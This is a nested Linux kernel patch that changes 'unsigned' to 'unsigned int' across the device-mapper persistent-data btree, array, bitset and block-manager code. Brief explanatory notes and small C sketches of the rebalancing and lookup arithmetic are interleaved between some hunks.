++	unsigned int nr_entries, max_entries;
+ 	struct dm_block *block;
+ 	struct array_block *ab;
+ 
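The dm-array lookups above all share one addressing step: a flat element index splits into a btree key (index / max_entries) and an entry offset within the array block (index % max_entries), as the lookup_ablock() comment notes. A tiny sketch with an assumed max_entries:

#include <stdio.h>

int main(void)
{
	unsigned int max_entries = 126;	/* assumed entries per array block */
	unsigned int index = 1000;
	unsigned int block_index = index / max_entries;
	unsigned int entry = index % max_entries;

	printf("btree key %u, entry %u\n", block_index, entry);
	return 0;
}
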
+diff --git a/drivers/md/persistent-data/dm-array.h b/drivers/md/persistent-data/dm-array.h
+index d7d2d579c662c..b6c7077c73591 100644
+--- a/drivers/md/persistent-data/dm-array.h
++++ b/drivers/md/persistent-data/dm-array.h
+@@ -198,7 +198,7 @@ struct dm_array_cursor {
+ 
+ 	struct dm_block *block;
+ 	struct array_block *ab;
+-	unsigned index;
++	unsigned int index;
+ };
+ 
+ int dm_array_cursor_begin(struct dm_array_info *info,
+diff --git a/drivers/md/persistent-data/dm-bitset.c b/drivers/md/persistent-data/dm-bitset.c
+index b7208d82e748a..625d93498cddb 100644
+--- a/drivers/md/persistent-data/dm-bitset.c
++++ b/drivers/md/persistent-data/dm-bitset.c
+@@ -41,7 +41,7 @@ EXPORT_SYMBOL_GPL(dm_bitset_empty);
+ 
+ struct packer_context {
+ 	bit_value_fn fn;
+-	unsigned nr_bits;
++	unsigned int nr_bits;
+ 	void *context;
+ };
+ 
+@@ -49,7 +49,7 @@ static int pack_bits(uint32_t index, void *value, void *context)
+ {
+ 	int r;
+ 	struct packer_context *p = context;
+-	unsigned bit, nr = min(64u, p->nr_bits - (index * 64));
++	unsigned int bit, nr = min(64u, p->nr_bits - (index * 64));
+ 	uint64_t word = 0;
+ 	bool bv;
+ 
+@@ -147,7 +147,7 @@ static int get_array_entry(struct dm_disk_bitset *info, dm_block_t root,
+ 			   uint32_t index, dm_block_t *new_root)
+ {
+ 	int r;
+-	unsigned array_index = index / BITS_PER_ARRAY_ENTRY;
++	unsigned int array_index = index / BITS_PER_ARRAY_ENTRY;
+ 
+ 	if (info->current_index_set) {
+ 		if (info->current_index == array_index)
+@@ -165,7 +165,7 @@ int dm_bitset_set_bit(struct dm_disk_bitset *info, dm_block_t root,
+ 		      uint32_t index, dm_block_t *new_root)
+ {
+ 	int r;
+-	unsigned b = index % BITS_PER_ARRAY_ENTRY;
++	unsigned int b = index % BITS_PER_ARRAY_ENTRY;
+ 
+ 	r = get_array_entry(info, root, index, new_root);
+ 	if (r)
+@@ -182,7 +182,7 @@ int dm_bitset_clear_bit(struct dm_disk_bitset *info, dm_block_t root,
+ 			uint32_t index, dm_block_t *new_root)
+ {
+ 	int r;
+-	unsigned b = index % BITS_PER_ARRAY_ENTRY;
++	unsigned int b = index % BITS_PER_ARRAY_ENTRY;
+ 
+ 	r = get_array_entry(info, root, index, new_root);
+ 	if (r)
+@@ -199,7 +199,7 @@ int dm_bitset_test_bit(struct dm_disk_bitset *info, dm_block_t root,
+ 		       uint32_t index, dm_block_t *new_root, bool *result)
+ {
+ 	int r;
+-	unsigned b = index % BITS_PER_ARRAY_ENTRY;
++	unsigned int b = index % BITS_PER_ARRAY_ENTRY;
+ 
+ 	r = get_array_entry(info, root, index, new_root);
+ 	if (r)
+diff --git a/drivers/md/persistent-data/dm-block-manager.c b/drivers/md/persistent-data/dm-block-manager.c
+index 11935864f50f5..1f40100908d7c 100644
+--- a/drivers/md/persistent-data/dm-block-manager.c
++++ b/drivers/md/persistent-data/dm-block-manager.c
+@@ -57,10 +57,10 @@ struct waiter {
+ 	int wants_write;
+ };
+ 
+-static unsigned __find_holder(struct block_lock *lock,
++static unsigned int __find_holder(struct block_lock *lock,
+ 			      struct task_struct *task)
+ {
+-	unsigned i;
++	unsigned int i;
+ 
+ 	for (i = 0; i < MAX_HOLDERS; i++)
+ 		if (lock->holders[i] == task)
+@@ -73,7 +73,7 @@ static unsigned __find_holder(struct block_lock *lock,
+ /* call this *after* you increment lock->count */
+ static void __add_holder(struct block_lock *lock, struct task_struct *task)
+ {
+-	unsigned h = __find_holder(lock, NULL);
++	unsigned int h = __find_holder(lock, NULL);
+ #ifdef CONFIG_DM_DEBUG_BLOCK_STACK_TRACING
+ 	struct stack_store *t;
+ #endif
+@@ -90,14 +90,14 @@ static void __add_holder(struct block_lock *lock, struct task_struct *task)
+ /* call this *before* you decrement lock->count */
+ static void __del_holder(struct block_lock *lock, struct task_struct *task)
+ {
+-	unsigned h = __find_holder(lock, task);
++	unsigned int h = __find_holder(lock, task);
+ 	lock->holders[h] = NULL;
+ 	put_task_struct(task);
+ }
+ 
+ static int __check_holder(struct block_lock *lock)
+ {
+-	unsigned i;
++	unsigned int i;
+ 
+ 	for (i = 0; i < MAX_HOLDERS; i++) {
+ 		if (lock->holders[i] == current) {
+@@ -376,8 +376,8 @@ struct dm_block_manager {
+ };
+ 
+ struct dm_block_manager *dm_block_manager_create(struct block_device *bdev,
+-						 unsigned block_size,
+-						 unsigned max_held_per_thread)
++						 unsigned int block_size,
++						 unsigned int max_held_per_thread)
+ {
+ 	int r;
+ 	struct dm_block_manager *bm;
+@@ -415,7 +415,7 @@ void dm_block_manager_destroy(struct dm_block_manager *bm)
+ }
+ EXPORT_SYMBOL_GPL(dm_block_manager_destroy);
+ 
+-unsigned dm_bm_block_size(struct dm_block_manager *bm)
++unsigned int dm_bm_block_size(struct dm_block_manager *bm)
+ {
+ 	return dm_bufio_get_block_size(bm->bufio);
+ }
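
The lock-debugging hunks above reuse one scan for two purposes: __find_holder() returns the slot holding a given task, and __add_holder() passes NULL to find a free slot. A userspace sketch of the scheme; the real __find_holder() BUG_ONs on a miss, which this sketch replaces with a sentinel return:

#include <stdio.h>

#define MAX_HOLDERS 4

static unsigned int find_holder(void *holders[], void *task)
{
	unsigned int i;

	for (i = 0; i < MAX_HOLDERS; i++)
		if (holders[i] == task)
			return i;
	return MAX_HOLDERS;	/* sentinel; the kernel version BUG_ONs */
}

int main(void)
{
	void *holders[MAX_HOLDERS] = { 0 };
	int t1;

	holders[find_holder(holders, 0)] = &t1;	/* add: claim a free slot */
	printf("t1 held in slot %u\n", find_holder(holders, &t1));
	holders[find_holder(holders, &t1)] = 0;	/* del: release the slot */
	return 0;
}
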
+diff --git a/drivers/md/persistent-data/dm-block-manager.h b/drivers/md/persistent-data/dm-block-manager.h
+index e728937f376a3..58a23b8ec1902 100644
+--- a/drivers/md/persistent-data/dm-block-manager.h
++++ b/drivers/md/persistent-data/dm-block-manager.h
+@@ -32,11 +32,11 @@ void *dm_block_data(struct dm_block *b);
+  */
+ struct dm_block_manager;
+ struct dm_block_manager *dm_block_manager_create(
+-	struct block_device *bdev, unsigned block_size,
+-	unsigned max_held_per_thread);
++	struct block_device *bdev, unsigned int block_size,
++	unsigned int max_held_per_thread);
+ void dm_block_manager_destroy(struct dm_block_manager *bm);
+ 
+-unsigned dm_bm_block_size(struct dm_block_manager *bm);
++unsigned int dm_bm_block_size(struct dm_block_manager *bm);
+ dm_block_t dm_bm_nr_blocks(struct dm_block_manager *bm);
+ 
+ /*----------------------------------------------------------------*/
+diff --git a/drivers/md/persistent-data/dm-btree-remove.c b/drivers/md/persistent-data/dm-btree-remove.c
+index 4ead31e0d8ce5..ac213138b0217 100644
+--- a/drivers/md/persistent-data/dm-btree-remove.c
++++ b/drivers/md/persistent-data/dm-btree-remove.c
+@@ -124,10 +124,10 @@ static int node_copy(struct btree_node *left, struct btree_node *right, int shif
+ /*
+  * Delete a specific entry from a leaf node.
+  */
+-static void delete_at(struct btree_node *n, unsigned index)
++static void delete_at(struct btree_node *n, unsigned int index)
+ {
+-	unsigned nr_entries = le32_to_cpu(n->header.nr_entries);
+-	unsigned nr_to_copy = nr_entries - (index + 1);
++	unsigned int nr_entries = le32_to_cpu(n->header.nr_entries);
++	unsigned int nr_to_copy = nr_entries - (index + 1);
+ 	uint32_t value_size = le32_to_cpu(n->header.value_size);
+ 	BUG_ON(index >= nr_entries);
+ 
+@@ -144,20 +144,20 @@ static void delete_at(struct btree_node *n, unsigned index)
+ 	n->header.nr_entries = cpu_to_le32(nr_entries - 1);
+ }
+ 
+-static unsigned merge_threshold(struct btree_node *n)
++static unsigned int merge_threshold(struct btree_node *n)
+ {
+ 	return le32_to_cpu(n->header.max_entries) / 3;
+ }
+ 
+ struct child {
+-	unsigned index;
++	unsigned int index;
+ 	struct dm_block *block;
+ 	struct btree_node *n;
+ };
+ 
+ static int init_child(struct dm_btree_info *info, struct dm_btree_value_type *vt,
+ 		      struct btree_node *parent,
+-		      unsigned index, struct child *result)
++		      unsigned int index, struct child *result)
+ {
+ 	int r, inc;
+ 	dm_block_t root;
+@@ -263,7 +263,7 @@ static int __rebalance2(struct dm_btree_info *info, struct btree_node *parent,
+ 		/*
+ 		 * Rebalance.
+ 		 */
+-		unsigned target_left = (nr_left + nr_right) / 2;
++		unsigned int target_left = (nr_left + nr_right) / 2;
+ 		ret = shift(left, right, nr_left - target_left);
+ 		if (ret)
+ 			return ret;
+@@ -273,7 +273,7 @@ static int __rebalance2(struct dm_btree_info *info, struct btree_node *parent,
+ }
+ 
+ static int rebalance2(struct shadow_spine *s, struct dm_btree_info *info,
+-		      struct dm_btree_value_type *vt, unsigned left_index)
++		      struct dm_btree_value_type *vt, unsigned int left_index)
+ {
+ 	int r;
+ 	struct btree_node *parent;
+@@ -310,7 +310,7 @@ static int delete_center_node(struct dm_btree_info *info, struct btree_node *par
+ 			      uint32_t nr_left, uint32_t nr_center, uint32_t nr_right)
+ {
+ 	uint32_t max_entries = le32_to_cpu(left->header.max_entries);
+-	unsigned shift = min(max_entries - nr_left, nr_center);
++	unsigned int shift = min(max_entries - nr_left, nr_center);
+ 
+ 	if (nr_left + shift > max_entries) {
+ 		DMERR("node shift out of bounds");
+@@ -351,10 +351,10 @@ static int redistribute3(struct dm_btree_info *info, struct btree_node *parent,
+ {
+ 	int s, ret;
+ 	uint32_t max_entries = le32_to_cpu(left->header.max_entries);
+-	unsigned total = nr_left + nr_center + nr_right;
+-	unsigned target_right = total / 3;
+-	unsigned remainder = (target_right * 3) != total;
+-	unsigned target_left = target_right + remainder;
++	unsigned int total = nr_left + nr_center + nr_right;
++	unsigned int target_right = total / 3;
++	unsigned int remainder = (target_right * 3) != total;
++	unsigned int target_left = target_right + remainder;
+ 
+ 	BUG_ON(target_left > max_entries);
+ 	BUG_ON(target_right > max_entries);
+@@ -422,7 +422,7 @@ static int __rebalance3(struct dm_btree_info *info, struct btree_node *parent,
+ 	uint32_t nr_center = le32_to_cpu(center->header.nr_entries);
+ 	uint32_t nr_right = le32_to_cpu(right->header.nr_entries);
+ 
+-	unsigned threshold = merge_threshold(left) * 4 + 1;
++	unsigned int threshold = merge_threshold(left) * 4 + 1;
+ 
+ 	if ((left->header.max_entries != center->header.max_entries) ||
+ 	    (center->header.max_entries != right->header.max_entries)) {
+@@ -440,7 +440,7 @@ static int __rebalance3(struct dm_btree_info *info, struct btree_node *parent,
+ }
+ 
+ static int rebalance3(struct shadow_spine *s, struct dm_btree_info *info,
+-		      struct dm_btree_value_type *vt, unsigned left_index)
++		      struct dm_btree_value_type *vt, unsigned int left_index)
+ {
+ 	int r;
+ 	struct btree_node *parent = dm_block_data(shadow_current(s));
+@@ -519,7 +519,7 @@ static int rebalance_children(struct shadow_spine *s,
+ 	return r;
+ }
+ 
+-static int do_leaf(struct btree_node *n, uint64_t key, unsigned *index)
++static int do_leaf(struct btree_node *n, uint64_t key, unsigned int *index)
+ {
+ 	int i = lower_bound(n, key);
+ 
+@@ -539,7 +539,7 @@ static int do_leaf(struct btree_node *n, uint64_t key, unsigned *index)
+  */
+ static int remove_raw(struct shadow_spine *s, struct dm_btree_info *info,
+ 		      struct dm_btree_value_type *vt, dm_block_t root,
+-		      uint64_t key, unsigned *index)
++		      uint64_t key, unsigned int *index)
+ {
+ 	int i = *index, r;
+ 	struct btree_node *n;
+@@ -589,7 +589,7 @@ static int remove_raw(struct shadow_spine *s, struct dm_btree_info *info,
+ int dm_btree_remove(struct dm_btree_info *info, dm_block_t root,
+ 		    uint64_t *keys, dm_block_t *new_root)
+ {
+-	unsigned level, last_level = info->levels - 1;
++	unsigned int level, last_level = info->levels - 1;
+ 	int index = 0, r = 0;
+ 	struct shadow_spine spine;
+ 	struct btree_node *n;
+@@ -601,7 +601,7 @@ int dm_btree_remove(struct dm_btree_info *info, dm_block_t root,
+ 		r = remove_raw(&spine, info,
+ 			       (level == last_level ?
+ 				&info->value_type : &le64_vt),
+-			       root, keys[level], (unsigned *)&index);
++			       root, keys[level], (unsigned int *)&index);
+ 		if (r < 0)
+ 			break;
+ 
+@@ -685,9 +685,9 @@ static int remove_nearest(struct shadow_spine *s, struct dm_btree_info *info,
+ 
+ static int remove_one(struct dm_btree_info *info, dm_block_t root,
+ 		      uint64_t *keys, uint64_t end_key,
+-		      dm_block_t *new_root, unsigned *nr_removed)
++		      dm_block_t *new_root, unsigned int *nr_removed)
+ {
+-	unsigned level, last_level = info->levels - 1;
++	unsigned int level, last_level = info->levels - 1;
+ 	int index = 0, r = 0;
+ 	struct shadow_spine spine;
+ 	struct btree_node *n;
+@@ -698,7 +698,7 @@ static int remove_one(struct dm_btree_info *info, dm_block_t root,
+ 	init_shadow_spine(&spine, info);
+ 	for (level = 0; level < last_level; level++) {
+ 		r = remove_raw(&spine, info, &le64_vt,
+-			       root, keys[level], (unsigned *) &index);
++			       root, keys[level], (unsigned int *) &index);
+ 		if (r < 0)
+ 			goto out;
+ 
+@@ -742,7 +742,7 @@ out:
+ 
+ int dm_btree_remove_leaves(struct dm_btree_info *info, dm_block_t root,
+ 			   uint64_t *first_key, uint64_t end_key,
+-			   dm_block_t *new_root, unsigned *nr_removed)
++			   dm_block_t *new_root, unsigned int *nr_removed)
+ {
+ 	int r;
+ 
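A worked example of the three-way rebalance targets computed in redistribute3() above: entries are split into thirds, and the leftover entry (when the total is not divisible by three) goes to the left node.

#include <stdio.h>

int main(void)
{
	unsigned int nr_left = 40, nr_center = 1, nr_right = 60;
	unsigned int total = nr_left + nr_center + nr_right;	/* 101 */
	unsigned int target_right = total / 3;			/* 33 */
	unsigned int remainder = (target_right * 3) != total;	/* 1 */
	unsigned int target_left = target_right + remainder;	/* 34 */

	printf("left %u center %u right %u\n",
	       target_left, total - target_left - target_right, target_right);
	return 0;
}
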
+diff --git a/drivers/md/persistent-data/dm-btree-spine.c b/drivers/md/persistent-data/dm-btree-spine.c
+index e653458888a7c..45a39d4f1c10f 100644
+--- a/drivers/md/persistent-data/dm-btree-spine.c
++++ b/drivers/md/persistent-data/dm-btree-spine.c
+@@ -234,12 +234,12 @@ dm_block_t shadow_root(struct shadow_spine *s)
+ 	return s->root;
+ }
+ 
+-static void le64_inc(void *context, const void *value_le, unsigned count)
++static void le64_inc(void *context, const void *value_le, unsigned int count)
+ {
+ 	dm_tm_with_runs(context, value_le, count, dm_tm_inc_range);
+ }
+ 
+-static void le64_dec(void *context, const void *value_le, unsigned count)
++static void le64_dec(void *context, const void *value_le, unsigned int count)
+ {
+ 	dm_tm_with_runs(context, value_le, count, dm_tm_dec_range);
+ }
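
le64_inc()/le64_dec() above hand the whole value array to dm_tm_with_runs(), which, judging by its name and the range callbacks it takes, coalesces consecutive block numbers so the reference-count update fires once per contiguous range; treat that description as an inference, not patch text. A userspace sketch of the coalescing:

#include <stdio.h>
#include <stdint.h>

static void inc_range(uint64_t b, uint64_t e)
{
	printf("inc blocks [%llu, %llu)\n",
	       (unsigned long long)b, (unsigned long long)e);
}

int main(void)
{
	uint64_t blocks[] = { 10, 11, 12, 40, 41, 99 };
	unsigned int i = 0, count = 6;

	while (i < count) {
		unsigned int j = i + 1;

		while (j < count && blocks[j] == blocks[j - 1] + 1)
			j++;			/* extend the run */
		inc_range(blocks[i], blocks[j - 1] + 1);
		i = j;
	}
	return 0;
}
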
+diff --git a/drivers/md/persistent-data/dm-btree.c b/drivers/md/persistent-data/dm-btree.c
+index 5ce64e93aae74..1cc783d7030d8 100644
+--- a/drivers/md/persistent-data/dm-btree.c
++++ b/drivers/md/persistent-data/dm-btree.c
+@@ -23,8 +23,8 @@ static void memcpy_disk(void *dest, const void *src, size_t len)
+ 	__dm_unbless_for_disk(src);
+ }
+ 
+-static void array_insert(void *base, size_t elt_size, unsigned nr_elts,
+-			 unsigned index, void *elt)
++static void array_insert(void *base, size_t elt_size, unsigned int nr_elts,
++			 unsigned int index, void *elt)
+ 	__dm_written_to_disk(elt)
+ {
+ 	if (index < nr_elts)
+@@ -80,7 +80,7 @@ void inc_children(struct dm_transaction_manager *tm, struct btree_node *n,
+ 		vt->inc(vt->context, value_ptr(n, 0), nr_entries);
+ }
+ 
+-static int insert_at(size_t value_size, struct btree_node *node, unsigned index,
++static int insert_at(size_t value_size, struct btree_node *node, unsigned int index,
+ 		     uint64_t key, void *value)
+ 	__dm_written_to_disk(value)
+ {
+@@ -162,9 +162,9 @@ EXPORT_SYMBOL_GPL(dm_btree_empty);
+ struct frame {
+ 	struct dm_block *b;
+ 	struct btree_node *n;
+-	unsigned level;
+-	unsigned nr_children;
+-	unsigned current_child;
++	unsigned int level;
++	unsigned int nr_children;
++	unsigned int current_child;
+ };
+ 
+ struct del_stack {
+@@ -193,7 +193,7 @@ static int unprocessed_frames(struct del_stack *s)
+ 
+ static void prefetch_children(struct del_stack *s, struct frame *f)
+ {
+-	unsigned i;
++	unsigned int i;
+ 	struct dm_block_manager *bm = dm_tm_get_bm(s->tm);
+ 
+ 	for (i = 0; i < f->nr_children; i++)
+@@ -205,7 +205,7 @@ static bool is_internal_level(struct dm_btree_info *info, struct frame *f)
+ 	return f->level < (info->levels - 1);
+ }
+ 
+-static int push_frame(struct del_stack *s, dm_block_t b, unsigned level)
++static int push_frame(struct del_stack *s, dm_block_t b, unsigned int level)
+ {
+ 	int r;
+ 	uint32_t ref_count;
+@@ -371,7 +371,7 @@ static int btree_lookup_raw(struct ro_spine *s, dm_block_t block, uint64_t key,
+ int dm_btree_lookup(struct dm_btree_info *info, dm_block_t root,
+ 		    uint64_t *keys, void *value_le)
+ {
+-	unsigned level, last_level = info->levels - 1;
++	unsigned int level, last_level = info->levels - 1;
+ 	int r = -ENODATA;
+ 	uint64_t rkey;
+ 	__le64 internal_value_le;
+@@ -467,7 +467,7 @@ out:
+ int dm_btree_lookup_next(struct dm_btree_info *info, dm_block_t root,
+ 			 uint64_t *keys, uint64_t *rkey, void *value_le)
+ {
+-	unsigned level;
++	unsigned int level;
+ 	int r = -ENODATA;
+ 	__le64 internal_value_le;
+ 	struct ro_spine spine;
+@@ -502,9 +502,9 @@ EXPORT_SYMBOL_GPL(dm_btree_lookup_next);
+  * Copies entries from one region of a btree node to another.  The regions
+  * must not overlap.
+  */
+-static void copy_entries(struct btree_node *dest, unsigned dest_offset,
+-			 struct btree_node *src, unsigned src_offset,
+-			 unsigned count)
++static void copy_entries(struct btree_node *dest, unsigned int dest_offset,
++			 struct btree_node *src, unsigned int src_offset,
++			 unsigned int count)
+ {
+ 	size_t value_size = le32_to_cpu(dest->header.value_size);
+ 	memcpy(dest->keys + dest_offset, src->keys + src_offset, count * sizeof(uint64_t));
+@@ -515,9 +515,9 @@ static void copy_entries(struct btree_node *dest, unsigned dest_offset,
+  * Moves entries from one region of a btree node to another.  The regions
+  * may overlap.
+  */
+-static void move_entries(struct btree_node *dest, unsigned dest_offset,
+-			 struct btree_node *src, unsigned src_offset,
+-			 unsigned count)
++static void move_entries(struct btree_node *dest, unsigned int dest_offset,
++			 struct btree_node *src, unsigned int src_offset,
++			 unsigned int count)
+ {
+ 	size_t value_size = le32_to_cpu(dest->header.value_size);
+ 	memmove(dest->keys + dest_offset, src->keys + src_offset, count * sizeof(uint64_t));
+@@ -528,7 +528,7 @@ static void move_entries(struct btree_node *dest, unsigned dest_offset,
+  * Erases the first 'count' entries of a btree node, shifting following
+  * entries down into their place.
+  */
+-static void shift_down(struct btree_node *n, unsigned count)
++static void shift_down(struct btree_node *n, unsigned int count)
+ {
+ 	move_entries(n, 0, n, count, le32_to_cpu(n->header.nr_entries) - count);
+ }
+@@ -537,7 +537,7 @@ static void shift_down(struct btree_node *n, unsigned count)
+  * Moves entries in a btree node up 'count' places, making space for
+  * new entries at the start of the node.
+  */
+-static void shift_up(struct btree_node *n, unsigned count)
++static void shift_up(struct btree_node *n, unsigned int count)
+ {
+ 	move_entries(n, count, n, 0, le32_to_cpu(n->header.nr_entries));
+ }
+@@ -548,18 +548,18 @@ static void shift_up(struct btree_node *n, unsigned count)
+  */
+ static void redistribute2(struct btree_node *left, struct btree_node *right)
+ {
+-	unsigned nr_left = le32_to_cpu(left->header.nr_entries);
+-	unsigned nr_right = le32_to_cpu(right->header.nr_entries);
+-	unsigned total = nr_left + nr_right;
+-	unsigned target_left = total / 2;
+-	unsigned target_right = total - target_left;
++	unsigned int nr_left = le32_to_cpu(left->header.nr_entries);
++	unsigned int nr_right = le32_to_cpu(right->header.nr_entries);
++	unsigned int total = nr_left + nr_right;
++	unsigned int target_left = total / 2;
++	unsigned int target_right = total - target_left;
+ 
+ 	if (nr_left < target_left) {
+-		unsigned delta = target_left - nr_left;
++		unsigned int delta = target_left - nr_left;
+ 		copy_entries(left, nr_left, right, 0, delta);
+ 		shift_down(right, delta);
+ 	} else if (nr_left > target_left) {
+-		unsigned delta = nr_left - target_left;
++		unsigned int delta = nr_left - target_left;
+ 		if (nr_right)
+ 			shift_up(right, delta);
+ 		copy_entries(right, 0, left, target_left, delta);
+@@ -576,10 +576,10 @@ static void redistribute2(struct btree_node *left, struct btree_node *right)
+ static void redistribute3(struct btree_node *left, struct btree_node *center,
+ 			  struct btree_node *right)
+ {
+-	unsigned nr_left = le32_to_cpu(left->header.nr_entries);
+-	unsigned nr_center = le32_to_cpu(center->header.nr_entries);
+-	unsigned nr_right = le32_to_cpu(right->header.nr_entries);
+-	unsigned total, target_left, target_center, target_right;
++	unsigned int nr_left = le32_to_cpu(left->header.nr_entries);
++	unsigned int nr_center = le32_to_cpu(center->header.nr_entries);
++	unsigned int nr_right = le32_to_cpu(right->header.nr_entries);
++	unsigned int total, target_left, target_center, target_right;
+ 
+ 	BUG_ON(nr_center);
+ 
+@@ -589,19 +589,19 @@ static void redistribute3(struct btree_node *left, struct btree_node *center,
+ 	target_right = (total - target_left - target_center);
+ 
+ 	if (nr_left < target_left) {
+-		unsigned left_short = target_left - nr_left;
++		unsigned int left_short = target_left - nr_left;
+ 		copy_entries(left, nr_left, right, 0, left_short);
+ 		copy_entries(center, 0, right, left_short, target_center);
+ 		shift_down(right, nr_right - target_right);
+ 
+ 	} else if (nr_left < (target_left + target_center)) {
+-		unsigned left_to_center = nr_left - target_left;
++		unsigned int left_to_center = nr_left - target_left;
+ 		copy_entries(center, 0, left, target_left, left_to_center);
+ 		copy_entries(center, left_to_center, right, 0, target_center - left_to_center);
+ 		shift_down(right, nr_right - target_right);
+ 
+ 	} else {
+-		unsigned right_short = target_right - nr_right;
++		unsigned int right_short = target_right - nr_right;
+ 		shift_up(right, right_short);
+ 		copy_entries(right, 0, left, nr_left - right_short, right_short);
+ 		copy_entries(center, 0, left, target_left, nr_left - target_left);
+@@ -642,7 +642,7 @@ static void redistribute3(struct btree_node *left, struct btree_node *center,
+  *
+  * Where A* is a shadow of A.
+  */
+-static int split_one_into_two(struct shadow_spine *s, unsigned parent_index,
++static int split_one_into_two(struct shadow_spine *s, unsigned int parent_index,
+ 			      struct dm_btree_value_type *vt, uint64_t key)
+ {
+ 	int r;
+@@ -696,7 +696,7 @@ static int split_one_into_two(struct shadow_spine *s, unsigned parent_index,
+  * to the new shadow.
+  */
+ static int shadow_child(struct dm_btree_info *info, struct dm_btree_value_type *vt,
+-			struct btree_node *parent, unsigned index,
++			struct btree_node *parent, unsigned int index,
+ 			struct dm_block **result)
+ {
+ 	int r, inc;
+@@ -725,11 +725,11 @@ static int shadow_child(struct dm_btree_info *info, struct dm_btree_value_type *
+  * Splits two nodes into three.  This is more work, but results in fuller
+  * nodes, so saves metadata space.
+  */
+-static int split_two_into_three(struct shadow_spine *s, unsigned parent_index,
++static int split_two_into_three(struct shadow_spine *s, unsigned int parent_index,
+                                 struct dm_btree_value_type *vt, uint64_t key)
+ {
+ 	int r;
+-	unsigned middle_index;
++	unsigned int middle_index;
+ 	struct dm_block *left, *middle, *right, *parent;
+ 	struct btree_node *ln, *rn, *mn, *pn;
+ 	__le64 location;
+@@ -830,7 +830,7 @@ static int btree_split_beneath(struct shadow_spine *s, uint64_t key)
+ {
+ 	int r;
+ 	size_t size;
+-	unsigned nr_left, nr_right;
++	unsigned int nr_left, nr_right;
+ 	struct dm_block *left, *right, *new_parent;
+ 	struct btree_node *pn, *ln, *rn;
+ 	__le64 val;
+@@ -904,7 +904,7 @@ static int btree_split_beneath(struct shadow_spine *s, uint64_t key)
+  * Redistributes a node's entries with its left sibling.
+  */
+ static int rebalance_left(struct shadow_spine *s, struct dm_btree_value_type *vt,
+-			  unsigned parent_index, uint64_t key)
++			  unsigned int parent_index, uint64_t key)
+ {
+ 	int r;
+ 	struct dm_block *sib;
+@@ -933,7 +933,7 @@ static int rebalance_left(struct shadow_spine *s, struct dm_btree_value_type *vt
+  * Redistributes a node's entries with its right sibling.
+  */
+ static int rebalance_right(struct shadow_spine *s, struct dm_btree_value_type *vt,
+-			   unsigned parent_index, uint64_t key)
++			   unsigned int parent_index, uint64_t key)
+ {
+ 	int r;
+ 	struct dm_block *sib;
+@@ -961,10 +961,10 @@ static int rebalance_right(struct shadow_spine *s, struct dm_btree_value_type *v
+ /*
+  * Returns the number of spare entries in a node.
+  */
+-static int get_node_free_space(struct dm_btree_info *info, dm_block_t b, unsigned *space)
++static int get_node_free_space(struct dm_btree_info *info, dm_block_t b, unsigned int *space)
+ {
+ 	int r;
+-	unsigned nr_entries;
++	unsigned int nr_entries;
+ 	struct dm_block *block;
+ 	struct btree_node *node;
+ 
+@@ -990,12 +990,12 @@ static int get_node_free_space(struct dm_btree_info *info, dm_block_t b, unsigne
+  */
+ #define SPACE_THRESHOLD 8
+ static int rebalance_or_split(struct shadow_spine *s, struct dm_btree_value_type *vt,
+-			      unsigned parent_index, uint64_t key)
++			      unsigned int parent_index, uint64_t key)
+ {
+ 	int r;
+ 	struct btree_node *parent = dm_block_data(shadow_parent(s));
+-	unsigned nr_parent = le32_to_cpu(parent->header.nr_entries);
+-	unsigned free_space;
++	unsigned int nr_parent = le32_to_cpu(parent->header.nr_entries);
++	unsigned int free_space;
+ 	int left_shared = 0, right_shared = 0;
+ 
+ 	/* Should we move entries to the left sibling? */
+@@ -1080,7 +1080,7 @@ static bool has_space_for_insert(struct btree_node *node, uint64_t key)
+ 
+ static int btree_insert_raw(struct shadow_spine *s, dm_block_t root,
+ 			    struct dm_btree_value_type *vt,
+-			    uint64_t key, unsigned *index)
++			    uint64_t key, unsigned int *index)
+ {
+ 	int r, i = *index, top = 1;
+ 	struct btree_node *node;
+@@ -1214,7 +1214,7 @@ int btree_get_overwrite_leaf(struct dm_btree_info *info, dm_block_t root,
+ }
+ 
+ static bool need_insert(struct btree_node *node, uint64_t *keys,
+-			unsigned level, unsigned index)
++			unsigned int level, unsigned int index)
+ {
+         return ((index >= le32_to_cpu(node->header.nr_entries)) ||
+ 		(le64_to_cpu(node->keys[index]) != keys[level]));
+@@ -1226,7 +1226,7 @@ static int insert(struct dm_btree_info *info, dm_block_t root,
+ 		  __dm_written_to_disk(value)
+ {
+ 	int r;
+-	unsigned level, index = -1, last_level = info->levels - 1;
++	unsigned int level, index = -1, last_level = info->levels - 1;
+ 	dm_block_t block = root;
+ 	struct shadow_spine spine;
+ 	struct btree_node *n;
+@@ -1412,7 +1412,7 @@ static int walk_node(struct dm_btree_info *info, dm_block_t block,
+ 		     void *context)
+ {
+ 	int r;
+-	unsigned i, nr;
++	unsigned int i, nr;
+ 	struct dm_block *node;
+ 	struct btree_node *n;
+ 	uint64_t keys;
+@@ -1455,7 +1455,7 @@ EXPORT_SYMBOL_GPL(dm_btree_walk);
+ 
+ static void prefetch_values(struct dm_btree_cursor *c)
+ {
+-	unsigned i, nr;
++	unsigned int i, nr;
+ 	__le64 value_le;
+ 	struct cursor_node *n = c->nodes + c->depth - 1;
+ 	struct btree_node *bn = dm_block_data(n->b);
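
The dm-btree hunks above are a type cleanup (unsigned -> unsigned int), but the rebalancing arithmetic they pass through is worth seeing in isolation. Below is a minimal userspace sketch of the redistribute2() split calculation, using plain int arrays as stand-ins for btree nodes; the names and the main() driver are illustrative, not the kernel API.

#include <stdio.h>
#include <string.h>

/* Userspace sketch of redistribute2(): balance two sorted arrays so
 * their sizes differ by at most one, moving entries between them the
 * same way copy_entries()/shift_down()/shift_up() do above. */
static void rebalance_pair(int *left, unsigned int *nr_left,
			   int *right, unsigned int *nr_right)
{
	unsigned int total = *nr_left + *nr_right;
	unsigned int target_left = total / 2;

	if (*nr_left < target_left) {
		unsigned int delta = target_left - *nr_left;

		/* take 'delta' entries from the front of right */
		memcpy(left + *nr_left, right, delta * sizeof(*right));
		memmove(right, right + delta,
			(*nr_right - delta) * sizeof(*right));
	} else if (*nr_left > target_left) {
		unsigned int delta = *nr_left - target_left;

		/* make room at the front of right, then copy over */
		memmove(right + delta, right, *nr_right * sizeof(*right));
		memcpy(right, left + target_left, delta * sizeof(*left));
	}
	*nr_left = target_left;
	*nr_right = total - target_left;
}

int main(void)
{
	int l[8] = { 1, 2, 3, 4, 5, 6 }, r[8] = { 7 };
	unsigned int nl = 6, nr = 1;

	rebalance_pair(l, &nl, r, &nr);
	printf("left=%u right=%u\n", nl, nr);	/* left=3 right=4 */
	return 0;
}
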
